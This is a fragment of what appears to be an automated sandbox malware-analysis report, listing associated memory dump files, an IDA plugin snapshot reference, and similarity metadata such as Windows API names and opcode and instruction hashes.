                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: ad92d9b65a336ddf8a0ef28a4ccdeb04f1dbb7e9d91ec0e3881d61000b43e960
                                • Instruction ID: cfb1f664608df19d9c15c2b8bd1573167f3fe8c8c99df47394b1b4206c6d50d5
                                • Opcode Fuzzy Hash: ad92d9b65a336ddf8a0ef28a4ccdeb04f1dbb7e9d91ec0e3881d61000b43e960
                                • Instruction Fuzzy Hash: D421CD7A900208A7DB28EBB0DD56FEE737C9754300F0045A8B665662C5DE7156C8CB91